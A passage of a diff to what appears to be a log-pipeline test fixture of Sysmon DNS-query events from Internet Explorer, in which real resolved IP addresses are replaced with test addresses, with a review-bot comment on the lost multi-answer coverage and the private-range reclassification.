@@ -18702,13 +18447,13 @@ "ul1.dvtps.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742508300Z", + "ingested": "2021-12-09T13:50:23.457586600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
@@ -18780,7 +18525,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742516800Z", + "ingested": "2021-12-09T13:50:23.457592300Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067946300Z'/\u003e\u003cEventRecordID\u003e200\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.912\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -18850,12 +18595,12 @@ "type": "CNAME" }, { - "data": "23.3.125.199", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "network": { 
@@ -18872,13 +18617,13 @@ "tags.bluekai.com" ], "ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742525300Z", + "ingested": "2021-12-09T13:50:23.457598100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.068Z", @@ -18938,27 +18683,27 @@ }, "answers": [ { - "data": "104.19.195.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.199.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.198.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.197.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.196.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { 
@@ -18966,7 +18711,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18974,7 +18719,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18982,23 +18727,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -19013,24 +18758,20 @@ "cdnjs.cloudflare.com" ], "ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742533800Z", + "ingested": "2021-12-09T13:50:23.457603900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19090,23 +18831,23 @@ }, "answers": [ { - "data": "85.194.243.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.243.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.240.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.242.103", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19114,7 +18855,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19122,7 +18863,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19130,7 +18871,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19139,17 +18880,17 @@ } ], "resolved_ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
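Review bot: Replacing every distinct A record with the same address leaves `dns.resolved_ip` with five identical entries while the `ip` list in the preceding hunk shrinks to one, so the fixture no longer exercises the multi-answer case it previously covered (the same pattern recurs in the later hunks for pixel.onaudience.com and sync.crwdcntrl.net). If the allowed test range offers more than one address, spreading the answers over distinct values would keep that coverage; if it does not, a short comment in the pipeline test's README or the changelog entry noting that duplicate answers are expected would save the next reader from reading it as a de-duplication bug. Note also that `192.5.6.30`-style nameserver addresses now fall in RFC 1918 space (`192.168.x.x`), which presumably changes any public/private classification or geo enrichment the pipeline applies; the expected file should be regenerated rather than hand-edited if that is the case. The enclosing event object starts and ends outside this hunk.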
@@ -19165,24 +18906,21 @@ "pixel.onaudience.com" ], "ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742542300Z", + "ingested": "2021-12-09T13:50:23.457609600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19250,12 +18988,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -19272,13 +19010,13 @@ "status.geotrust.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742550800Z", + "ingested": "2021-12-09T13:50:23.457615800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19342,11 +19080,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19354,7 +19092,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19362,7 +19100,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19370,7 +19108,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -19378,21 +19116,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -19408,22 +19146,22 @@ "ocsp.trust-provider.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742559300Z", + "ingested": "2021-12-09T13:50:23.457621500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
